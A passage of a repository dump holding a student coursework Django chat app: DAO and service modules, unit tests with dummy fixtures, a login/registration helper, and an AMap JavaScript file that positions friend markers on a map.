"blob_id": "57e4b3738afa0301c4693f62631fe4727a6d0db9",
"content_id": "8af4ff3dfd714e276cf67cf1bbffb648612c71f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/zzc/adam2014/DAO/VoiceMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import VoiceMessage\n# class VoiceMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\ndef insertVoiceMessage(**voiceMessage):\n v = VoiceMessage.objects.create(**voiceMessage)\n return v;\n\n\ndef deleteVoiceMessage(id):\n VoiceMessage.objects.get(id=id).delete()\n\ndef getVoiceMessageById(id):\n return VoiceMessage.objects.get(id=id)\n\ndef updateVoiceMessage(**kw):\n VoiceMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6684350371360779,
"avg_line_length": 18.789474487304688,
"blob_id": "6453d428cc697f0b643b2245ac4b3dfec84476f0",
"content_id": "e59cd83b7cc7767d2e7525be2da63fbe1f9d46b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 19,
"path": "/zzc/adam2014/Service/JoinService/Group_userService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.DAO.JoinDAO import Group_userDAO\n\ndef getGroup_users(group_id):\n group_users = []\n try:\n group_users = Group_userDAO.getGroup_userListView(group_id)\n\n except:\n pass\n return group_users\n\n"
},
{
"alpha_fraction": 0.6232091784477234,
"alphanum_fraction": 0.6479226350784302,
"avg_line_length": 32.638553619384766,
"blob_id": "353f7798ea76089f7df222b27fd167755d606802",
"content_id": "aff11aa6962ee2fbc54c96d7c252898517098bf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2808,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 83,
"path": "/zzc/adam2014/AllTest/DAOTest/testLocationMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\n__author__ = 'Joe'\n\nfrom django.test import TestCase\nfrom adam2014.DAO.LocationMessageDAO import *\nfrom adam2014.models import LocationMessage\nfrom adam2014.models import Message\n\n\nclass LocationMessageDAOTest(TestCase):\n\n def setUp(self):\n\n # 文字\n self.message1 = {\"id\": 1, \"type\": \"1\", \"content_id\": \"1\"}\n # 图片\n self.message2 = {\"id\": 2, \"type\": \"2\", \"content_id\": \"2\"}\n # 语音\n self.message3 = {\"id\": 3, \"type\": \"3\", \"content_id\": \"3\"}\n # 位置\n self.message4 = {\"id\": 4, \"type\": \"4\", \"content_id\": \"4\"}\n\n self.message1 = Message.objects.create(**self.message1)\n self.message2 = Message.objects.create(**self.message2)\n self.message3 = Message.objects.create(**self.message3)\n self.message4 = Message.objects.create(**self.message4)\n\n self.location_message1 = {\"id\": 1, \"message\": self.message1, \"content\": \"today is a good day\"}\n self.location_message2 = {\"id\": 2, \"message\": self.message2, \"content\": \"today is a bad day\"}\n self.location_message3 = {\"id\": 3, \"message\": self.message3, \"content\": \"today is a rainy day\"}\n\n LocationMessage.objects.create(**self.location_message1)\n LocationMessage.objects.create(**self.location_message2)\n LocationMessage.objects.create(**self.location_message3)\n\n def testInsertLocationMessage(self):\n\n location_message5 = {\"id\": 5, \"message\": self.message4, \"content\": \"today is a coding day\"}\n before = len(LocationMessage.objects.all())\n\n print \"testInsertLocationMessage before:\"\n print(LocationMessage.objects.all())\n\n insertLocationMessage(**location_message5)\n\n after = len(LocationMessage.objects.all())\n print \"testInsertLocationMessage after:\"\n print(LocationMessage.objects.all())\n\n self.assertEqual(after-before, 1)\n\n def testdeleteLocationMessage(self):\n\n print \"before delete: \"\n print len(LocationMessage.objects.all())\n\n deleteLocationMessage(1)\n deleteLocationMessage(2)\n deleteLocationMessage(3)\n\n print \"after delete: \"\n print len(LocationMessage.objects.all())\n\n def testGetLocationMessageById(self):\n\n print(\"testGetLocationMessageById 1&2:\")\n self.assertEqual(getLocationMessageById(1).id, 1)\n print(getLocationMessageById(1))\n self.assertEqual(getLocationMessageById(2).id, 2)\n print(getLocationMessageById(2))\n\n def testUpdateLocationMessageById(self):\n\n print \"Before update: \"\n print getLocationMessageById(1)\n\n self.location_message1['content'] = \"hello, am i handsome?\"\n\n updateLocationMessage(**self.location_message1)\n\n print \"After update: \"\n print getLocationMessageById(1)\n"
},
{
"alpha_fraction": 0.6691792011260986,
"alphanum_fraction": 0.6800670027732849,
"avg_line_length": 23.8125,
"blob_id": "02566055992a5774c7d5e629030e1a3547e0f797",
"content_id": "59caf48971f7b700077cac089489ae3e05ddb682",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1250,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 48,
"path": "/zzc/adam2014/Service/AddFriendService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import AddFriend\nfrom adam2014.DAO import AddFriendDAO\nfrom django.db import IntegrityError, transaction\nimport datetime\n\ndef newAddFriend(**addFriend):\n a = 'error'\n try:\n a = AddFriendDAO.insertAddFriend(**addFriend)\n except IntegrityError: #若usre1添加user2,user2还未确认,user1又发起了添加请求,则更新添加请求的时间\n now = datetime.datetime.now()\n a = AddFriendDAO.getAddFriendByuser_from_idAnduser_to_id(addFriend['user_from_id'],addFriend['user_to_id'])\n a.time = str(now)\n a.save()\n return a\n\ndef deleteAddFriend(id):\n try:\n AddFriendDAO.deleteAddFriend(id)\n except:\n return \"error\"\n return 'success'\n\ndef getAddFriendByuser_to_id(user_to_id):\n AddFriend = None\n try:\n AddFriend = AddFriendDAO.getAddFriendById(user_to_id)\n except:\n pass\n return AddFriend\n\ndef getAddFriendByuser_from_id(user_from_id):\n AddFriend = None\n try:\n AddFriend = AddFriendDAO.getAddFriendById(user_from_id)\n except:\n pass\n return AddFriend\n\n\n\n"
},
{
"alpha_fraction": 0.5813148617744446,
"alphanum_fraction": 0.5826989412307739,
"avg_line_length": 33.42856979370117,
"blob_id": "d8f15bb6dcea9fe49c4b8e8e6b044bb30faa65e6",
"content_id": "8dc1a33c7da5a67f5ec342a2a656ec84e874396f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1445,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 42,
"path": "/zzc/adam2014/JoinModels/FriendRelationListView.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\nimport datetime\nimport json\nclass FriendRelationListView(object):\n def __init__(self,frid,inBlackList,top,remark,time,userid,nickname,longitude,latitude,code,photo,phone):\n self.userid = userid\n self.frid = frid\n self.nickname = nickname\n self.code = code\n self.inBlackList = inBlackList\n self.top = top\n self.remark = remark\n self.longitude = longitude\n self.latitude = latitude\n self.photo = photo\n self.phone = phone\n self.time = time\n\n\n def printout(self):\n print(\"userid: \"+str(self.userid)+\" frid \"+str(self.frid)\n +\" nickname: \"+str(self.nickname)+\" code: \"+str(self.code)\n +\" inBlackList: \"+str(self.inBlackList)+' top: '+str(self.top)\n + 'remark: '+str(self.remark)+\" longitude:\"+str(self.longitude)+\" latitude\"+str(self.latitude))\\\n +' phone:'+str(self.phone)+' photo:'+str(self.photo)+' time:'+str(self.time)\n\n def object2dict(obj):\n d = {}\n #d['__class__'] = obj.__class__.__name__\n #d['__module__'] = obj.__module__\n d.update(obj.__dict__)\n return d\n\n\n# now = datetime.datetime.now()\n# print(now)\n# fr = FriendRelationListView('null','null','null','null',now,'null','null','null','null','null','null','null')\n# fr.printout()\n# print(fr)\n# #json = json.dumps(json.dumps({\"friend\": fr}))\n# json = fr.object2dict()\n# print(json)"
},
{
"alpha_fraction": 0.5795240998268127,
"alphanum_fraction": 0.6268002390861511,
"avg_line_length": 47.378787994384766,
"blob_id": "b3ba172b413daa7197dbfc0684955fa0f6b951f7",
"content_id": "3444bc0956c9d7b6c1006608ed19b28abbb1afb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3194,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 66,
"path": "/zzc/adam2014/AllTest/DAOTest/testBottlePictureDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'flower_type'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.models import User\nfrom adam2014.DAO.BottlePictureDAO import *\nfrom adam2014.models import BottlePicture\nimport datetime\n\n\nclass BottlePictureTest(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n\n self.bottlePicture1 = {\"id\":1, \"usedTimes\":21, \"tookTime\":str(self.time), \"author\":\"jack\",\n \"content\":\"hello world!\", \"longitude\":12.33, \"latitude\":25.66, \"user_id\":1}\n self.bottlePicture2 = {\"id\":2, \"usedTimes\":13, \"tookTime\":str(self.time), \"author\":\"tom\",\n \"content\":\"welcome to python!\", \"longitude\":24.33, \"latitude\":16.87, \"user_id\":2}\n BottlePicture.objects.create(**self.bottlePicture1)\n BottlePicture.objects.create(**self.bottlePicture2)\n\n\n def test_insertBottlePicture(self):\n print(\"insertTest\")\n print(\"insertInform: id=3, usedTimes=24, tookTime=now, anthor=max, content=this is a insertcontent\")\n bottlePicture3 = {\"id\":3, \"usedTimes\":24, \"tookTime\":str(self.time), \"author\":\"max\",\n \"content\":\"this is a insert content!\", \"longitude\":13.21, \"latitude\":61.34, \"user_id\":1}\n before = len(BottlePicture.objects.all())\n insertBottlePicture(**bottlePicture3)\n after = len(BottlePicture.objects.all())\n print(\"insertResult\")\n print(BottlePicture.objects.all())\n self.assertEqual(after-before,1)\n\n def test_getBottlePictureById(self):\n print(\"getTest\")\n print(\"getInform: id=1, id=2\")\n print(\"getResult:\")\n print(getBottlePictureById(1))\n print(getBottlePictureById(2))\n self.assertEqual(getBottlePictureById(1).id,1)\n self.assertEqual(getBottlePictureById(2).id,2)\n\n def test_updateBottlePicture(self):\n print(\"updateTest\")\n print(\"updateInform: id=1, author=new_jack\")\n modified_bottlePicture = {\"id\":1, \"usedTimes\":22, \"tookTime\":str(self.time), \"author\":\"new_jack\",\n \"content\":\"new hello world!\", \"longitude\":66.66, \"latitude\":55.55, \"user_id\":1}\n updateBottlePicture(**modified_bottlePicture)\n print(\"updateResult:\")\n print(getBottlePictureById(1))\n self.assertEqual(getBottlePictureById(1).author, \"new_jack\")\n\n def test_deleteBottlePicture(self):\n print(\"deleteTest\")\n print(\"deleteInform: id=1, id=2\")\n deleteBottlePicture(1)\n deleteBottlePicture(2)\n self.assertEqual(len(BottlePicture.objects.filter(id=1)),0)\n self.assertEqual(len(BottlePicture.objects.filter(id=2)),0)\n\n"
},
{
"alpha_fraction": 0.6318715214729309,
"alphanum_fraction": 0.6324892044067383,
"avg_line_length": 20.586666107177734,
"blob_id": "f1838004387d0fcb30728c62c15b2f6f8ccdb423",
"content_id": "af19ccc026b13992d3ac5fd9bfd0eff7fe61ea38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 75,
"path": "/zzc/adam2014/auth/Httpsession.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n# -*- coding: utf-8 -*-\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\n####################################################\n#\n# 除了 UserVerify(request) 这个函数为了调用的方便返回值为True 或 False\n# 其余全部字符串,如 UserRegister(UserCode,Password) 返回值为\"Register Success\"\"Register False\"\n#\n# 切记,除了检测用户是否登陆、用户登出传入的参数为 request 外,其余全是 UserCode + Password\n#\n#\n####################################################\n\n\n\n\n\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\n\n\n# 用户注册\n# Joe\ndef UserRegister(usercode, password):\n try:\n user = User.objects.create_user(username=usercode, email='NULL', password=password)\n user.is_staff = True\n return \"Register Success\"\n except:\n return \"Register False\"\n\n#管理员注册\ndef AdminRegister(self):\n return \"Success\"\n\n\n#用户登陆\ndef UserLogin(request, usercode, password):\n user = auth.authenticate(username=usercode, password=password)\n if user is not None:\n auth.login(request, user)\n print usercode + \" Login Success\"\n return True\n return False\n\n\n#用户登出\ndef UserLogoff(request):\n auth.logout(request)\n return \"Logoff Success\"\n\n#检测用户是否登陆\ndef UserVerify(request):\n if request.user.is_authenticated():\n return True\n else:\n return False\n\n#用户更改密码\ndef UserChangePassWord(UserCode,Password):\n user = User.objects.get(username=UserCode)\n if user is None:\n return \"no such person\"\n else:\n user.set_password(Password)\n user.save()\n return \"Change Success\"\n\n\n#UserRegister(\"yyz\", \"\")\n"
},
{
"alpha_fraction": 0.727011501789093,
"alphanum_fraction": 0.7385057210922241,
"avg_line_length": 24.814815521240234,
"blob_id": "1610dba76a5967c9a7b77117c44d471984e00605",
"content_id": "a93496045eab61395092cb7baa0b3bb8df9bf97a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/zzc/adam2014/DAO/LocationMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import LocationMessage\n# class LocationMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\ndef insertLocationMessage(**locationMessage):\n l = LocationMessage.objects.create(**locationMessage)\n return l;\n\n\ndef deleteLocationMessage(id):\n LocationMessage.objects.get(id=id).delete()\n\ndef getLocationMessageById(id):\n return LocationMessage.objects.get(id=id)\n\ndef updateLocationMessage(**kw):\n LocationMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6729323267936707,
"alphanum_fraction": 0.6879699230194092,
"avg_line_length": 18.629629135131836,
"blob_id": "bd924a434cb9c9e3bdf189be1fd12949a1772879",
"content_id": "56002096851658b821b0f5ad544a5667919f7c4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/zzc/adam2014/DAO/GroupDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import Group\n\ndef insertGroup(**group):\n g = Group.objects.create(**group)\n return g;\n\ndef deleteGroup(id):\n Group.objects.get(id=id).delete()\n\ndef getGroupById(id):\n return Group.objects.get(id=id)\n\ndef getGroupByCode(code):\n return Group.objects.filter(code=code)\n\ndef updateGroup(**kw):\n Group.objects.filter(id=kw['id']).update(**kw)\n\n\n"
},
{
"alpha_fraction": 0.7245565056800842,
"alphanum_fraction": 0.7338935732841492,
"avg_line_length": 30.52941131591797,
"blob_id": "ea16a0a4d39809e2c85ab802b02d8c066a627c9b",
"content_id": "9a557c8d16ae64c92950d7442524b535a7cfcfb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 34,
"path": "/zzc/adam2014/DAO/FriendRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import FriendRelation\n# class FriendRelation(models.Model):\n# user_from = models.ForeignKey(User)\n# user_to_id = models.IntegerField()\n# time = models.DateTimeField()\n# inBlackList = models.BooleanField(default=None)\n# remark = models.CharField(max_length=16)\n# top = models.BooleanField(default=None)\n\n\ndef insertFriendRelation(**friendRelation):\n f = FriendRelation.objects.create(**friendRelation)\n return f\n\ndef deleteFriendRelation(user_from_id,user_to_id):\n FriendRelation.objects.get(user_from_id=user_from_id,user_to_id=user_to_id).delete()\n\ndef getFriendRelationById(id):\n return FriendRelation.objects.get(id=id)\n\ndef getFriendRelationByCondition(user_from_id,user_to_id):\n return FriendRelation.objects.get(user_from_id=user_from_id,user_to_id=user_to_id)\n\ndef updateFriendRelation(**kw):\n FriendRelation.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.7759562730789185,
"alphanum_fraction": 0.7759562730789185,
"avg_line_length": 35.400001525878906,
"blob_id": "7e23092e045e0aea21b209bbbe879ba7cc5d177c",
"content_id": "15c538333fd24487e4da584a7320895ff37c398d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 183,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 5,
"path": "/README.md",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# zzc\n\nThe project is also called Project Adam (as can be seem from the naming of one of the app folders). \n\nIt is courcework of Software Project Management and Quality Engineering.\n\n"
},
{
"alpha_fraction": 0.5817421674728394,
"alphanum_fraction": 0.6121254563331604,
"avg_line_length": 23,
"blob_id": "cd2324059c786346553a2e898caf4f06cd5c3c49",
"content_id": "0239ebaa37b84ae4d899f8a5bda993f1d8b76c9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 8235,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 299,
"path": "/zzc/Distance/js/map.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "var mapObj = new AMap.Map('container');\nvar geolocation;\nvar currentX;\nvar currentY;\nvar friendsPosition_X = new Array();\nvar friendsPosition_Y = new Array();\nvar currentPositionMarker;\nvar friendsMarker = new Array();\n\n\nfunction initialize() {\n\n\t//从数据库获取上次朋友在线的位置;\n\tfriendsPosition_X.push(116.406326);\n\tfriendsPosition_Y.push(39.903942);\n\tfriendsPosition_X.push(115.406326);\n\tfriendsPosition_Y.push(32.903942);\n\n\n\tvar temp1 = new AMap.Marker({ // 创建自定义点标注 \n\t\tmap: mapObj,\n\t\tposition: new AMap.LngLat(116.406326, 39.903942),\n\t\toffset: new AMap.Pixel(0, 0),\n\t\ticon: \"img/top.png\"\n\t});\n\n\tvar temp2 = new AMap.Marker({ // 创建自定义点标注 \n\t\tmap: mapObj,\n\t\tposition: new AMap.LngLat(115.406326, 32.903942),\n\t\toffset: new AMap.Pixel(0, 0),\n\t\ticon: \"img/top.png\"\n\t});\n\n\tfriendsMarker.push(temp1);\n\tfriendsMarker.push(temp2);\n\n\n\n\t//地图添加浏览器定位功能\n\tmapObj.plugin('AMap.Geolocation', function() {\n\t\tgeolocation = new AMap.Geolocation({\n\t\t\tenableHighAccuracy: true, //是否使用高精度定位,默认:true\n\t\t\ttimeout: 10000, //超过10秒后停止定位,默认:无穷大\n\t\t\tmaximumAge: 0, //定位结果缓存0毫秒,默认:0\n\t\t\tconvert: true, //自动偏移坐标,偏移后的坐标为高德坐标,默认:true\n\t\t\tshowButton: true, //显示定位按钮,默认:true\n\t\t\tbuttonPosition: 'LB', //定位按钮停靠位置,默认:'LB',左下角\n\t\t\tbuttonOffset: new AMap.Pixel(10, 20), //定位按钮与设置的停靠位置的偏移量,默认:Pixel(10, 20)\n\t\t\tshowMarker: true, //定位成功后在定位到的位置显示点标记,默认:true\n\t\t\tshowCircle: false, //定位成功后用圆圈表示定位精度范围,默认:true\n\t\t\tpanToLocation: true, //定位成功后将定位到的位置作为地图中心点,默认:true\n\t\t\tzoomToAccuracy: true //定位成功后调整地图视野范围使定位位置及精度范围视野内可见,默认:false\n\t\t});\n\n\t\tmapObj.addControl(geolocation);\n\t\tAMap.event.addListener(geolocation, 'complete', onComplete); //返回定位信息\n\t\tAMap.event.addListener(geolocation, 'error', onError); //返回定位出错信息\n\t});\n\n\tAMap.event.addListener(mapObj, 'complete', mapOnComplete()); //返回定位信息\n\tAMap.event.addListener(mapObj, 'click', getLnglat);\n\n}\n\n\nfunction mapOnComplete() {\n\n\twatchPosition();\n\t//showMarkers();\n\n\n\n}\n\n//判读marker是否应该显示\nfunction showMarkers(e) {\n\n\n\t//\tfriendsMarker.setMap(null);\n\t//\tfriendsMarker.setMap(null);\n\t// mapObj.clearMap();\n\t//marker2.setMap(null);\n\t//显示当前位置\n\n\n\t// var marker = new AMap.Marker({ // 创建自定义点标注 \n\t//\t map:mapObj, \n\t//\t position: new AMap.LngLat(currentX, currentY), \n\t//\t offset: new AMap.Pixel(-10,-34), \n\t//\t icon: \"img/top.png\" \n\t//\t }); \n\n\t//首先计算中心点的经纬度\n\tvar mapCenter = mapObj.getCenter();\n\tvar x0 = mapCenter.getLng();\n\tvar y0 = mapCenter.getLat();\n\t//alert(latitude+\"and\"+longitude);\n\t//计算地图的高度和宽度;\n\tvar height = $(\"#container\").height();\n\tvar width = $(\"#container\").width();\n\t//拿到x1,y1的经纬度\n\tvar ll = mapObj.containTolnglat(new AMap.Pixel(0, 0));\n\tvar x1 = ll.getLng();\n\tvar y1 = ll.getLat();\n\t//拿到x2,y2的经纬度\n\tvar lll = mapObj.containTolnglat(new AMap.Pixel(width, height));\n\tvar x2 = lll.getLng();\n\tvar y2 = lll.getLat();\n\t// var x=e.lnglat.getLng();\n\t//var y=e.lnglat.getLat();\n\tfor (var i = 0; i < friendsMarker.length; i++) {\n\n\n\t\tvar x = friendsPosition_X[i];\n\t\tvar y = friendsPosition_Y[i];\n\n\t\tif (x > x1 && x < x2 && y > y2 && y < y1) {\n\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x, y));\n\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, 0));\n\t\t\tfriendsMarker[i].setIcon(\"img/down.png\");\n\n\t\t} else {\n\t\t\tif (isTopOn2(x0, y0, x1, y1, x, y)) {\n\t\t\t\tif (isTopOn1(x0, y0, x2, y1, x, y)) {\n\t\t\t\t\t//在直线1和2的上方\n\n\t\t\t\t\tvar x_acture = (x - x0) * (y1 - y0) / (y - y0) + x0;\n\n\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x_acture, y1));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, 0));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/top.png\");\n\n\n\n\t\t\t\t}\n\t\t\t\t//在直线的1的下方,在直线2的上方\n\t\t\t\telse {\n\t\t\t\t\tvar y_acture = (y - y0) * (x2 - x0) / (x - x0) + y0;\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x2, y_acture));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(-32, 0));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/right.png\");\n\n\n\t\t\t\t}\n\n\t\t\t} else {\n\t\t\t\t//在直线1的上方,直线2的下方\n\t\t\t\tif (isTopOn1(x0, y0, x2, y1, x, y)) {\n\t\t\t\t\tvar y_acture = (y - y0) * (x1 - x0) / (x - x0) + y0;\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x1, y_acture));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, 0));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/left.png\");\n\t\t\t\t}\n\t\t\t\t//在直线1的下方,直线2的下方\n\t\t\t\telse {\n\t\t\t\t\tvar x_acture = (x - x0) * (y2 - y0) / (y - y0) + x0;\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x_acture, y2));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, -32));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/down.png\");\n\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\n\t}\n\n}\n\n\n\n//判断是否在直线的上方\nfunction isTopOn1(x0, y0, x2, y1, xi, yi) {\n\n\tvar tempY = xi * (y1 - y0) / (x2 - x0) + ((x2 - x0) * y0 - (y1 - y0) * x0) / (x2 - x0);\n\tif (tempY > yi) {\n\n\t\treturn false;\n\n\t} else {\n\n\t\treturn true;\n\t}\n}\n\n//判断是否在直线2的上方\n\n//判断是否在直线的上方\nfunction isTopOn2(x0, y0, x1, y1, xi, yi) {\n\n\tvar tempY = xi * (y1 - y0) / (x1 - x0) + ((x1 - x0) * y0 - (y1 - y0) * x0) / (x1 - x0);\n\n\tif (tempY > yi) {\n\n\t\treturn false;\n\t} else {\n\t\treturn true;\n\t}\n}\n\n\n/*\n *解析定位结果\n */\nfunction onComplete(data) {\n\n\n\t\tAMap.event.addListener(mapObj, 'zoomchange', showMarkers);\n\t\tAMap.event.addListener(mapObj, 'moveend', showMarkers);\n\t\t//mapObj.clearMap();\n\t\tcurrentX = data.position.getLng();\n\t\tcurrentY = data.position.getLat();\n\t\tif (currentPositionMarker != null) currentPositionMarker.setMap(null);\n\n\t\tvar markerContent = '<div> <img src=\"img/down.png\"> </img><img src=\"img/hehe.png\"></img></div>'\n\n\n\n\t\t// var markerContent = document.createElement(\"div\");\n\t\t//\t markerContent.className = \"markerContentStyle\";\n\t\t// \t//点标记中的图标\n\t\t//\tvar markerImg= document.createElement(\"img\");\n\t\t// markerImg.className=\"markerlnglat\";\n\t\t//\t markerImg.src=\"img/down.png\";\t\n\t\t//\t markerContent.appendChild(markerImg);\n\t\t//\t \n\t\t//\t \t//点标记中的图标\n\t\t//\tvar markerImg1= document.createElement(\"img\");\n\t\t// markerImg1.className=\"markerlnglat\";\n\t\t//\t markerImg1.src=\"img/down.png\";\t\n\t\t//\t markerContent.appendChild(markerImg1);\n\t\t//\t\n\n\t\tcurrentPositionMarker = new AMap.Marker({ //创建自定义点标注 \n\t\t\tmap: mapObj,\n\t\t\tposition: new AMap.LngLat(currentX, currentY),\n\t\t\toffset: new AMap.Pixel(-11, -32),\n\t\t\ticon: \"img/down.png\",\n\t\t\tcontent: markerContent //自定义点标记覆盖物内容\n\n\t\t});\n\n\t\t//\t\tvar str = '<p>定位成功</p>';\n\t\t//\t\tstr += '<p>经度:' + data.position.getLng() + '</p>';\n\t\t//\t\tstr += '<p>纬度:' + data.position.getLat() + '</p>'; \n\t\t//\t\tstr += '<p>精度:' + data.accuracy + ' 米</p>';\n\t\t//\t\tstr += '<p>是否经过偏移:' + (data.isConverted ? '是' : '否') + '</p>';\n\t\t//\t\tresult.innerHTML = str;\n\n\t}\n\t/*\n\t *监控当前位置并获取当前位置信息\n\t */\n\t/*\n\t *解析定位错误信息\n\t */\n\nfunction onError(data) {\n\tvar str = '<p>定位失败</p>';\n\tstr += '<p>错误信息:'\n\tswitch (data.info) {\n\t\tcase 'PERMISSION_DENIED':\n\t\t\tstr += '浏览器阻止了定位操作';\n\t\t\tbreak;\n\t\tcase 'POSITION_UNAVAILBLE':\n\t\t\tstr += '无法获得当前位置';\n\t\t\tbreak;\n\t\tcase 'TIMEOUT':\n\t\t\tstr += '定位超时';\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tstr += '未知错误';\n\t\t\tbreak;\n\t}\n\tstr += '</p>';\n\tresult.innerHTML = str;\n}\n\nfunction getCurrentPosition() {\n\tgeolocation.getCurrentPosition();\n}\n\nfunction watchPosition() {\n\tgeolocation.watchPosition();\n}\n\n//获取地图中心点的经纬度\nfunction getMapCenter() {\n\n\tvar mapCenter = mapObj.getCenter();\n}\n\nfunction getLnglat(e) {\n\tvar x = e.lnglat.getLng();\n\tvar y = e.lnglat.getLat();\n\tvar ll = mapObj.containTolnglat(new AMap.Pixel(x, y));\n\n}"
},
{
"alpha_fraction": 0.572945773601532,
"alphanum_fraction": 0.6226942539215088,
"avg_line_length": 34.039215087890625,
"blob_id": "66b51af472849aaa802f897319f513599fa13457",
"content_id": "b1ed8d728740880858346e51a48d0c74b2fa6898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1789,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 51,
"path": "/zzc/adam2014/AllTest/DAOTest/testGroupDAO.py",
